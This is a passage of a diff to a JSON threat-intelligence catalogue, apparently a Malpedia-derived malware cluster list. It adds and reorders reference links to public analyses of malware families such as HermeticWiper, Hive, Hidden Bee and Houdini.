"https://cip.gov.ua/en/news/khto-stoyit-za-kiberatakami-na-ukrayinsku-kritichnu-informaciinu-infrastrukturu-statistika-15-22-bereznya", - "https://www.secureworks.com/blog/disruptive-hermeticwiper-attacks-targeting-ukrainian-organizations", - "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/defenders-blog-on-cyberattacks-targeting-ukraine.html", - "https://www.welivesecurity.com/2022/03/01/isaacwiper-hermeticwizard-wiper-worm-targeting-ukraine/", - "https://www.crowdstrike.com/blog/how-crowdstrike-falcon-protects-against-wiper-malware-used-in-ukraine-attacks/", - "https://www.youtube.com/watch?v=mrTdSdMMgnk", - "https://cluster25.io/2022/02/24/ukraine-analysis-of-the-new-disk-wiping-malware/", - "https://msrc-blog.microsoft.com/2022/02/28/analysis-resources-cyber-threat-activity-ukraine", - "https://community.riskiq.com/article/9f59cb85", - "https://inquest.net/blog/2022/04/07/ukraine-cyberwar-overview", - "https://securelist.com/webinar-on-cyberattacks-in-ukraine-summary-and-qa/106075/", - "https://unit42.paloaltonetworks.com/preparing-for-cyber-impact-russia-ukraine-crisis/", - "https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-hermeticwiper-partyticket", + "https://yoroi.company/research/diskkill-hermeticwiper-a-disruptive-cyber-weapon-targeting-ukraines-critical-infrastructures/", "https://msrc-blog.microsoft.com/2022/02/28/analysis-resources-cyber-threat-activity-ukraine/", - "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE4Vwwd", - "https://t3n.de/news/cyber-attacken-ukraine-wiper-malware-1454318/", - "https://thehackernews.com/2022/02/new-wiper-malware-targeting-ukraine.html", - "https://thehackernews.com/2022/02/putin-warns-russian-critical.html", - "https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023", + "https://inquest.net/blog/2022/04/07/ukraine-cyberwar-overview", "https://learnsentinel.blog/2022/02/28/detecting-malware-kill-chains-with-defender-and-microsoft-sentinel/", - "https://twitter.com/fr0gger_/status/1497121876870832128", - "https://blog.qualys.com/vulnerabilities-threat-research/2022/03/01/ukrainian-targets-hit-by-hermeticwiper-new-datawiper-malware", - "https://blogs.blackberry.com/en/2022/03/threat-thursday-hermeticwiper", - "https://twitter.com/threatintel/status/1496578746014437376", - "https://cloudsek.com/technical-analysis-of-the-hermetic-wiper-malware-used-to-target-ukraine/", - "https://dgc.org/en/hermeticwiper-malware/", - "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-057A_Destructive_Malware_Targeting_Organizations_in_Ukraine.pdf", - "https://www.bitdefender.com/blog/hotforsecurity/five-things-you-need-to-know-about-the-cyberwar-in-ukraine/", - "https://lifars.com/2022/03/a-closer-look-at-the-russian-actors-targeting-organizations-in-ukraine/", - "https://www.brighttalk.com/webcast/15591/534324", - "https://eln0ty.github.io/malware%20analysis/HermeticWiper/", - "https://marcoramilli.com/2022/03/01/diskkill-hermeticwiper-and-notpetya-dissimilarities/", - "https://cyberpeaceinstitute.org/ukraine-timeline-of-cyberattacks", - "https://www.microsoft.com/en-us/security/business/security-insider/wp-content/uploads/2023/03/A-year-of-Russian-hybrid-warfare-in-Ukraine_MS-Threat-Intelligence-1.pdf", - "https://go.recordedfuture.com/hubfs/reports/mtp-2022-0302.pdf", - "https://securityboulevard.com/2022/03/isaacwiper-followed-hermeticwiper-attack-on-ukraine-orgs/", - "https://blog.nviso.eu/2022/02/24/threat-update-ukraine-russia-tensions/", - "https://www.deepinstinct.com/blog/hermeticwiper-malware-the-russian-ukrainian-cyber-war", - "https://socradar.io/what-you-need-to-know-about-russian-cyber-escalation-in-ukraine/", - "https://www.englert.one/hermetic-wiper-reverse-code-engineering", + "https://www.fortinet.com/blog/threat-research/the-increasing-wiper-malware-threat", + "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/", "https://www.splunk.com/en_us/blog/security/detecting-hermeticwiper.html", + "https://unit42.paloaltonetworks.com/preparing-for-cyber-impact-russia-ukraine-crisis/", + "https://cluster25.io/2022/02/24/ukraine-analysis-of-the-new-disk-wiping-malware/", + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war", + "https://www.mandiant.com/resources/information-operations-surrounding-ukraine", + "https://securelist.com/webinar-on-cyberattacks-in-ukraine-summary-and-qa/106075/", + "https://twitter.com/threatintel/status/1496578746014437376", + "https://eclypsium.com/2022/06/02/conti-targets-critical-firmware/", + "https://www.youtube.com/watch?v=sUlW45c9izU", + "https://www.welivesecurity.com/2022/03/01/isaacwiper-hermeticwizard-wiper-worm-targeting-ukraine/", + "https://www.nextgov.com/cybersecurity/2022/03/ukrainian-cyber-lead-least-4-types-malware-are-targeting-ukrainian-institutions/363558/", + "https://thehackernews.com/2022/02/new-wiper-malware-targeting-ukraine.html", + "https://socradar.io/what-you-need-to-know-about-russian-cyber-escalation-in-ukraine/", + "https://go.recordedfuture.com/hubfs/reports/mtp-2022-0302.pdf", + "https://threatpost.com/microsoft-ukraine-foxblade-trojan-hours-before-russian-invasion/178702/", + "https://www.cisa.gov/uscert/ncas/alerts/aa22-057a", + "https://www.microsoft.com/en-us/security/business/security-insider/wp-content/uploads/2023/03/A-year-of-Russian-hybrid-warfare-in-Ukraine_MS-Threat-Intelligence-1.pdf", + "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-057A_Destructive_Malware_Targeting_Organizations_in_Ukraine.pdf", + "https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-hermeticwiper-partyticket", + "https://securityintelligence.com/posts/new-destructive-malware-cyber-attacks-ukraine/", + "https://www.bitdefender.com/blog/hotforsecurity/five-things-you-need-to-know-about-the-cyberwar-in-ukraine/", + "https://blog.malwarebytes.com/threat-intelligence/2022/03/hermeticwiper-a-detailed-analysis-of-the-destructive-malware-that-targeted-ukraine/", + "https://www.secureworks.com/blog/disruptive-hermeticwiper-attacks-targeting-ukrainian-organizations", + "https://elastic.github.io/security-research/intelligence/2022/03/01.hermeticwiper-targets-ukraine/article/", + "https://twitter.com/fr0gger_/status/1497121876870832128", + "https://blogs.blackberry.com/en/2022/03/threat-thursday-hermeticwiper", + "https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023", + "https://securityboulevard.com/2022/03/isaacwiper-followed-hermeticwiper-attack-on-ukraine-orgs/", + "https://www.kaspersky.com/blog/hermeticransom-hermeticwiper-attacks-2022/43825/", + "https://www.crowdstrike.com/blog/how-crowdstrike-falcon-protects-against-wiper-malware-used-in-ukraine-attacks/", + "https://www.zscaler.com/blogs/security-research/hermeticwiper-resurgence-targeted-attacks-ukraine", + "https://www.englert.one/hermetic-wiper-reverse-code-engineering", + "https://dgc.org/en/hermeticwiper-malware/", + "https://www.mandiant.com/resources/russia-invasion-ukraine-retaliation", "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/growling-bears-make-thunderous-noise.html", "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-3/", - "https://cybersecurity.att.com/blogs/labs-research/analysis-on-recent-wiper-attacks-examples-and-how-they-wiper-malware-works", - "https://elastic.github.io/security-research/intelligence/2022/03/01.hermeticwiper-targets-ukraine/article/", - "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/", - "https://www.zdnet.com/article/microsoft-finds-foxblade-malware-on-ukrainian-systems-removing-rt-from-windows-app-store/", - "https://brandefense.io/hermeticwiper-technical-analysis-report/", - "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war", - "https://blogs.vmware.com/networkvirtualization/2022/03/hermetic-malware-multi-component-threat-targeting-ukraine-organizations.html/", "https://www.sentinelone.com/labs/hermetic-wiper-ukraine-under-attack/", - "https://services.google.com/fh/files/blogs/google_fog_of_war_research_report.pdf", - "https://www.fortinet.com/blog/threat-research/the-increasing-wiper-malware-threat", - "https://therecord.media/second-data-wiper-attack-hits-ukraine-computer-networks/", - "https://threatpost.com/microsoft-ukraine-foxblade-trojan-hours-before-russian-invasion/178702/", - "https://www.kaspersky.com/blog/hermeticransom-hermeticwiper-attacks-2022/43825/", - "https://www.youtube.com/watch?v=sUlW45c9izU", - "https://www.mandiant.com/resources/russia-invasion-ukraine-retaliation", - "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war/", - "https://www.mandiant.com/resources/information-operations-surrounding-ukraine", - "https://www.nextgov.com/cybersecurity/2022/03/ukrainian-cyber-lead-least-4-types-malware-are-targeting-ukrainian-institutions/363558/", - "https://www.zscaler.com/blogs/security-research/hermeticwiper-resurgence-targeted-attacks-ukraine", + "https://msrc-blog.microsoft.com/2022/02/28/analysis-resources-cyber-threat-activity-ukraine", + "https://cybersecurity.att.com/blogs/labs-research/analysis-on-recent-wiper-attacks-examples-and-how-they-wiper-malware-works", + "https://blog.qualys.com/vulnerabilities-threat-research/2022/03/01/ukrainian-targets-hit-by-hermeticwiper-new-datawiper-malware", + "https://cip.gov.ua/en/news/khto-stoyit-za-kiberatakami-na-ukrayinsku-kritichnu-informaciinu-infrastrukturu-statistika-15-22-bereznya", "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/digging-into-hermeticwiper.html", + "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE4Vwwd", + "https://t3n.de/news/cyber-attacken-ukraine-wiper-malware-1454318/", + "https://www.deepinstinct.com/blog/hermeticwiper-malware-the-russian-ukrainian-cyber-war", + "https://twitter.com/Sebdraven/status/1496878431719473155", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ukraine-wiper-malware-russia", + "https://eln0ty.github.io/malware%20analysis/HermeticWiper/", + "https://services.google.com/fh/files/blogs/google_fog_of_war_research_report.pdf", + "https://brandefense.io/hermeticwiper-technical-analysis-report/", + "https://community.riskiq.com/article/9f59cb85", + "https://cyberpeaceinstitute.org/ukraine-timeline-of-cyberattacks", + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war/", + "https://thehackernews.com/2022/02/putin-warns-russian-critical.html", + "https://lifars.com/2022/03/a-closer-look-at-the-russian-actors-targeting-organizations-in-ukraine/", + "https://www.brighttalk.com/webcast/15591/534324", "https://www.tesorion.nl/en/resources/pdfstore/Report-OSINT-Russia-Ukraine-Conflict-Cyberaspect.pdf", - "https://yoroi.company/research/diskkill-hermeticwiper-a-disruptive-cyber-weapon-targeting-ukraines-critical-infrastructures/", - "https://www.cisa.gov/uscert/ncas/alerts/aa22-057a", - "https://eclypsium.com/2022/06/02/conti-targets-critical-firmware/", + "https://therecord.media/second-data-wiper-attack-hits-ukraine-computer-networks/", + "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/defenders-blog-on-cyberattacks-targeting-ukraine.html", "https://blogs.microsoft.com/on-the-issues/2022/12/03/preparing-russian-cyber-offensive-ukraine/", - "https://www.welivesecurity.com/2022/02/24/hermeticwiper-new-data-wiping-malware-hits-ukraine/", "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/c/cyberattacks-are-prominent-in-the-russia-ukraine-conflict/IOC%20Resource%20for%20Russia-Ukraine%20Conflict-Related%20Cyberattacks-03032022.pdf", - "https://securityintelligence.com/posts/new-destructive-malware-cyber-attacks-ukraine/", - "https://blog.malwarebytes.com/threat-intelligence/2022/03/hermeticwiper-a-detailed-analysis-of-the-destructive-malware-that-targeted-ukraine/" + "https://www.youtube.com/watch?v=mrTdSdMMgnk", + "https://www.welivesecurity.com/2022/02/24/hermeticwiper-new-data-wiping-malware-hits-ukraine/", + "https://blog.nviso.eu/2022/02/24/threat-update-ukraine-russia-tensions/", + "https://www.zdnet.com/article/microsoft-finds-foxblade-malware-on-ukrainian-systems-removing-rt-from-windows-app-store/", + "https://cloudsek.com/technical-analysis-of-the-hermetic-wiper-malware-used-to-target-ukraine/", + "https://blogs.vmware.com/networkvirtualization/2022/03/hermetic-malware-multi-component-threat-targeting-ukraine-organizations.html/", + "https://marcoramilli.com/2022/03/01/diskkill-hermeticwiper-and-notpetya-dissimilarities/" ], "synonyms": [ "DriveSlayer", @@ -27653,12 +28948,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hermeticwizard", - "https://www.youtube.com/watch?v=mrTdSdMMgnk", + "https://twitter.com/ET_Labs/status/1502494650640351236", "https://twitter.com/silascutler/status/1501668345640366091", "https://inquest.net/blog/2022/04/07/ukraine-cyberwar-overview", - "https://securelist.com/webinar-on-cyberattacks-in-ukraine-summary-and-qa/106075/", - "https://twitter.com/ET_Labs/status/1502494650640351236", - "https://www.brighttalk.com/webcast/15591/534324" + "https://www.brighttalk.com/webcast/15591/534324", + "https://www.youtube.com/watch?v=mrTdSdMMgnk", + "https://securelist.com/webinar-on-cyberattacks-in-ukraine-summary-and-qa/106075/" ], "synonyms": [], "type": [] @@ -27721,14 +29016,15 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hiddenbee", - "https://blog.malwarebytes.com/threat-analysis/2018/08/reversing-malware-in-a-custom-format-hidden-bee-elements/", "https://www.msreverseengineering.com/blog/2018/9/2/weekend-project-a-custom-ida-loader-module-for-the-hidden-bee-malware-family", - "https://blog.malwarebytes.com/threat-analysis/2019/08/the-hidden-bee-infection-chain-part-1-the-stegano-pack/", "https://blog.malwarebytes.com/threat-analysis/2019/05/hidden-bee-lets-go-down-the-rabbit-hole/", + "https://www.freebuf.com/column/174581.html", "https://www.bleepingcomputer.com/news/security/new-underminer-exploit-kit-discovered-pushing-bootkits-and-coinminers/", "https://www.freebuf.com/column/175106.html", + "https://research.checkpoint.com/2023/from-hidden-bee-to-rhadamanthys-the-evolution-of-custom-executable-formats/", "https://blog.malwarebytes.com/threat-analysis/2018/07/hidden-bee-miner-delivered-via-improved-drive-by-download-toolkit/", - "https://www.freebuf.com/column/174581.html" + "https://blog.malwarebytes.com/threat-analysis/2018/08/reversing-malware-in-a-custom-format-hidden-bee-elements/", + "https://blog.malwarebytes.com/threat-analysis/2019/08/the-hidden-bee-infection-chain-part-1-the-stegano-pack/" ], "synonyms": [], "type": [] @@ -27742,13 +29038,13 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hiddentear", "https://dissectingmalwa.re/earn-quick-btc-with-hiddentearmp4-about-open-source-ransomware.html", - "https://www.slideshare.net/ChristopherDoman/open-source-malware-sharing-is-caring", - "https://www.tripwire.com/state-of-security/security-data-protection/cyber-security/hidden-tear-project-forbidden-fruit-is-the-sweetest/", + "https://twitter.com/struppigel/status/950787783353884672", "https://twitter.com/JAMESWT_MHT/status/1264828072001495041", "https://github.com/goliate/hidden-tear", + "https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-2/", + "https://www.tripwire.com/state-of-security/security-data-protection/cyber-security/hidden-tear-project-forbidden-fruit-is-the-sweetest/", "https://www.bleepingcomputer.com/news/security/new-f-unicorn-ransomware-hits-italy-via-fake-covid-19-infection-map/", - "https://twitter.com/struppigel/status/950787783353884672", - "https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-2/" + "https://www.slideshare.net/ChristopherDoman/open-source-malware-sharing-is-caring" ], "synonyms": [ "FuckUnicorn" @@ -27763,9 +29059,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hidedrv", + "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", "http://www.sekoia.fr/blog/wp-content/uploads/2016/10/Rootkit-analysis-Use-case-on-HIDEDRV-v1.6.pdf", - "https://www.secureworks.com/research/threat-profiles/iron-twilight", - "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html" + "https://www.secureworks.com/research/threat-profiles/iron-twilight" ], "synonyms": [], "type": [] @@ -27781,8 +29077,8 @@ "https://twitter.com/MrDanPerez/status/1159461995013378048", "https://speakerdeck.com/aragorntseng/winnti-is-coming-evolution-after-prosecution-at-hitcon2021", "https://www.fireeye.com/blog/threat-research/2019/08/game-over-detecting-and-stopping-an-apt41-operation.html", - "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf", - "https://content.fireeye.com/apt-41/rpt-apt41/" + "https://content.fireeye.com/apt-41/rpt-apt41/", + "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf" ], "synonyms": [], "type": [] @@ -27818,17 +29114,30 @@ "uuid": "d9f03a69-507d-4b1d-af6d-e76fca5952b7", "value": "HIGHNOTE" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.hijackloader", + "https://www.zscaler.com/blogs/security-research/technical-analysis-hijackloader" + ], + "synonyms": [], + "type": [] + }, + "uuid": "cbba3bc7-9491-402c-af3b-9a15b8bce122", + "value": "HijackLoader" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hikit", - "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2013/hidden_lynx.pdf", - "https://www.secureworks.com/research/threat-profiles/bronze-keystone", "https://attack.mitre.org/groups/G0001/", - "https://web.archive.org/web/20141016080249/http://www.symantec.com/connect/blogs/security-vendors-take-action-against-hidden-lynx-malware", + "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2013/hidden_lynx.pdf", "https://www.recordedfuture.com/hidden-lynx-analysis/", - "https://www.symantec.com/connect/blogs/security-vendors-take-action-against-hidden-lynx-malware" + "https://www.secureworks.com/research/threat-profiles/bronze-keystone", + "https://www.symantec.com/connect/blogs/security-vendors-take-action-against-hidden-lynx-malware", + "https://web.archive.org/web/20141016080249/http://www.symantec.com/connect/blogs/security-vendors-take-action-against-hidden-lynx-malware" ], "synonyms": [], "type": [] @@ -27880,47 +29189,49 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hive", - "https://yoroi.company/research/on-the-footsteps-of-hive-ransomware/", - "https://www.advintel.io/post/enter-karakurt-data-extortion-arm-of-prolific-ransomware-group", - "https://www.sentinelone.com/labs/nokoyawa-ransomware-new-karma-nemty-variant-wears-thin-disguise/", - "https://lifars.com/2022/02/how-to-decrypt-the-files-encrypted-by-the-hive-ransomware/", - "https://securityaffairs.co/wordpress/128232/security/recover-files-hive-ransomware.html", - "https://www.kroll.com/en/insights/publications/cyber/hive-ransomware-technical-analysis-initial-access-discovery", - "https://www.bleepingcomputer.com/news/security/hive-ransomware-ports-its-linux-vmware-esxi-encryptor-to-rust/", + "https://www.incibe-cert.es/sites/default/files/contenidos/estudios/doc/incibe-cert_estudio_analisis_hive_2021_v1.pdf", "https://www.scmagazine.com/brief/breach/novel-obfuscation-leveraged-by-hive-ransomware", - "https://www.threatstop.com/blog/first-conti-then-hive-costa-rica-gets-hit-with-ransomware-again", - "https://www.bleepingcomputer.com/news/security/microsoft-exchange-servers-hacked-to-deploy-hive-ransomware/", - "https://www.connectwise.com/resources/hive-profile", - "https://therecord.media/hive-ransomware-shuts-down-california-health-care-organization/", + "https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2023-CTI-007.pdf", + "https://securelist.com/modern-ransomware-groups-ttps/106824/", "https://github.com/reecdeep/HiveV5_file_decryptor", + "https://thehackernews.com/2022/02/master-key-for-hive-ransomware.html", + "https://www.rapid7.com/blog/post/2023/01/11/increasing-the-sting-of-hive-ransomware/", "https://www.sentinelone.com/blog/hive-ransomware-deploys-novel-ipfuscation-technique/", - "https://yoroi.company/wp-content/uploads/2022/07/Yoroi-On-The-Footsteps-of-Hive-Ransomware.pdf", + "https://securityaffairs.co/wordpress/128232/security/recover-files-hive-ransomware.html", + "https://lifars.com/2022/02/how-to-decrypt-the-files-encrypted-by-the-hive-ransomware/", + "https://krebsonsecurity.com/2023/05/russian-hacker-wazawaka-indicted-for-ransomware/", + "https://therecord.media/academics-publish-method-for-recovering-data-encrypted-by-the-hive-ransomware/", + "https://www.connectwise.com/resources/hive-profile", + "https://www.threatstop.com/blog/first-conti-then-hive-costa-rica-gets-hit-with-ransomware-again", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker", "https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023", - "https://unit42.paloaltonetworks.com/emerging-ransomware-groups/", + "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/787/original/ransomware-chats.pdf", + "https://www.sentinelone.com/labs/nokoyawa-ransomware-new-karma-nemty-variant-wears-thin-disguise/", + "https://www.bleepingcomputer.com/news/security/hive-ransomware-uses-new-ipfuscation-trick-to-hide-payload/", + "https://yoroi.company/wp-content/uploads/2022/07/Yoroi-On-The-Footsteps-of-Hive-Ransomware.pdf", + "https://blog.talosintelligence.com/2022/05/conti-and-hive-ransomware-operations.html", + "https://blog.group-ib.com/hive", + "https://arxiv.org/pdf/2202.08477.pdf", + "https://www.ic3.gov/Media/News/2021/210825.pdf", + "https://www.kroll.com/en/insights/publications/cyber/hive-ransomware-technical-analysis-initial-access-discovery", + "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/787/original/ransomware-chats.pdf?1651576098", + "https://www.microsoft.com/security/blog/2022/07/05/hive-ransomware-gets-upgrades-in-rust/", + "https://www.netskope.com/blog/hive-ransomware-actively-targeting-hospitals", + "https://www.advintel.io/post/enter-karakurt-data-extortion-arm-of-prolific-ransomware-group", + "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v", + "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself", "https://labs.sentinelone.com/hive-attacks-analysis-of-the-human-operated-ransomware-targeting-healthcare/", + "https://therecord.media/hive-ransomware-shuts-down-california-health-care-organization/", + "https://yoroi.company/research/on-the-footsteps-of-hive-ransomware/", "https://www.advintel.io/post/discontinued-the-end-of-conti-s-brand-marks-new-chapter-for-cybercrime-landscape", + "https://www.bleepingcomputer.com/news/security/hive-ransomware-ports-its-linux-vmware-esxi-encryptor-to-rust/", "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-hive", "https://www.malwarebytes.com/blog/threat-intelligence/2022/20221121-threat-intel-report-final.pdf", - "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself", - "https://arxiv.org/pdf/2202.08477.pdf", - "https://blog.talosintelligence.com/2022/05/conti-and-hive-ransomware-operations.html", - "https://www.netskope.com/blog/hive-ransomware-actively-targeting-hospitals", - "https://www.rapid7.com/blog/post/2023/01/11/increasing-the-sting-of-hive-ransomware/", - "https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf", - "https://www.varonis.com/blog/hive-ransomware-analysis", - "https://thehackernews.com/2022/02/master-key-for-hive-ransomware.html", - "https://www.bleepingcomputer.com/news/security/hive-ransomware-uses-new-ipfuscation-trick-to-hide-payload/", - "https://www.ic3.gov/Media/News/2021/210825.pdf", - "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/787/original/ransomware-chats.pdf", - "https://securelist.com/modern-ransomware-groups-ttps/106824/", - "https://therecord.media/academics-publish-method-for-recovering-data-encrypted-by-the-hive-ransomware/", - "https://blog.group-ib.com/hive", - "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/787/original/ransomware-chats.pdf?1651576098", - "https://www.incibe-cert.es/sites/default/files/contenidos/estudios/doc/incibe-cert_estudio_analisis_hive_2021_v1.pdf", - "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker", + "https://unit42.paloaltonetworks.com/emerging-ransomware-groups/", + "https://www.bleepingcomputer.com/news/security/microsoft-exchange-servers-hacked-to-deploy-hive-ransomware/", "https://github.com/rivitna/Malware/tree/main/Hive", - "https://www.microsoft.com/security/blog/2022/07/05/hive-ransomware-gets-upgrades-in-rust/" + "https://www.varonis.com/blog/hive-ransomware-analysis" ], "synonyms": [], "type": [] @@ -28012,17 +29323,17 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hoplight", - "https://www.us-cert.gov/ncas/analysis-reports/ar19-304a", - "https://www.us-cert.gov/ncas/analysis-reports/AR19-100A", - "https://researchcenter.paloaltonetworks.com/2017/08/unit42-blockbuster-saga-continues/", - "https://www.us-cert.gov/ncas/analysis-reports/ar20-045g", - "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", "https://labs.sentinelone.com/dprk-hidden-cobra-update-north-korean-malicious-cyber-activity/", "https://www.fireeye.com/content/dam/fireeye-www/global/en/blog/threat-research/FireEye_HWP_ZeroDay.pdf", - "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf", + "https://www.us-cert.gov/ncas/analysis-reports/AR19-100A", "https://www.secureworks.com/research/threat-profiles/nickel-academy", - "https://securelist.com/apt-trends-report-q2-2019/91897/", - "https://www.computing.co.uk/ctg/news/3074007/lazarus-rises-warning-over-new-hoplight-malware-linked-with-north-korea" + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", + "https://researchcenter.paloaltonetworks.com/2017/08/unit42-blockbuster-saga-continues/", + "https://www.computing.co.uk/ctg/news/3074007/lazarus-rises-warning-over-new-hoplight-malware-linked-with-north-korea", + "https://www.us-cert.gov/ncas/analysis-reports/ar19-304a", + "https://www.us-cert.gov/ncas/analysis-reports/ar20-045g", + "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf", + "https://securelist.com/apt-trends-report-q2-2019/91897/" ], "synonyms": [ "HANGMAN" @@ -28076,9 +29387,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hotcroissant", + "https://www.us-cert.gov/ncas/analysis-reports/ar20-045d", "https://labs.sentinelone.com/dprk-hidden-cobra-update-north-korean-malicious-cyber-activity/", - "https://www.carbonblack.com/2020/04/16/vmware-carbon-black-tau-threat-analysis-the-evolution-of-lazarus/", - "https://www.us-cert.gov/ncas/analysis-reports/ar20-045d" + "https://www.carbonblack.com/2020/04/16/vmware-carbon-black-tau-threat-analysis-the-evolution-of-lazarus/" ], "synonyms": [], "type": [] @@ -28091,10 +29402,13 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hotwax", - "https://www.virusbulletin.com/uploads/pdf/magazine/2018/VB2018-Kalnai-Poslusny.pdf", + "https://securelist.com/lazarus-under-the-hood/77908/", + "https://raw.githubusercontent.com/eric-erki/APT_CyberCriminal_Campagin_Collections/master/2017/2017.05.30.Lazarus_Arisen/Group-IB_Lazarus.pdf", "https://content.fireeye.com/apt/rpt-apt38", - "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180244/Lazarus_Under_The_Hood_PDF_final.pdf", - "https://www.welivesecurity.com/2017/02/16/demystifying-targeted-malware-used-polish-banks/" + "https://www.welivesecurity.com/2017/02/16/demystifying-targeted-malware-used-polish-banks/", + "https://www.virusbulletin.com/uploads/pdf/magazine/2018/VB2018-Kalnai-Poslusny.pdf", + "https://baesystemsai.blogspot.com/2017/02/lazarus-false-flag-malware.html", + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180244/Lazarus_Under_The_Hood_PDF_final.pdf" ], "synonyms": [], "type": [] @@ -28107,32 +29421,32 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.houdini", - "https://www.cadosecurity.com/post/threat-group-uses-voice-changing-software-in-espionage-attempt", + "https://unit42.paloaltonetworks.com/unit42-houdinis-magic-reappearance/", + "http://blogs.360.cn/post/analysis-of-apt-c-37.html", + "https://threatpost.com/ta2541-apt-rats-aviation/178422/", + "https://cybersecurity.att.com/blogs/labs-research/alien-labs-2019-analysis-of-threat-groups-molerats-and-apt-c-37", + "https://blog.talosintelligence.com/2021/09/operation-layover-how-we-tracked-attack.html", + "https://isc.sans.edu/forums/diary/Houdini+is+Back+Delivered+Through+a+JavaScript+Dropper/28746/", + "https://blogs.360.cn/post/APT-C-44.html", + "https://yoroi.company/research/threatening-within-budget-how-wsh-rat-is-abused-by-cyber-crooks/", "https://github.com/jeFF0Falltrades/IoCs/blob/master/Broadbased/wsh_rat.md", - "https://mp.weixin.qq.com/s/gWOIRNPLVqX761LW8x-S5g", + "https://www.vectra.ai/blogpost/moonlight-middle-east-targeted-attacks", + "https://www.cadosecurity.com/post/threat-group-uses-voice-changing-software-in-espionage-attempt", + "http://blog.morphisec.com/hworm-houdini-aka-njrat", "https://www.youtube.com/watch?v=XDAiS6KBDOs", "https://www.bleepingcomputer.com/news/security/unskilled-hacker-linked-to-years-of-attacks-on-aviation-transport-sectors/", - "https://blogs.360.cn/post/APT-C-44.html", + "https://cofense.com/houdini-worm-transformed-new-phishing-attack/", + "https://www.trellix.com/en-us/about/newsroom/stories/research/cyberattacks-targeting-ukraine-increase.html", + "https://myonlinesecurity.co.uk/more-agenttesla-keylogger-and-nanocore-rat-in-one-bundle/", + "https://about.fb.com/news/2021/04/taking-action-against-hackers-in-palestine/", + "https://www.youtube.com/watch?v=h3KLKCdMUUY", + 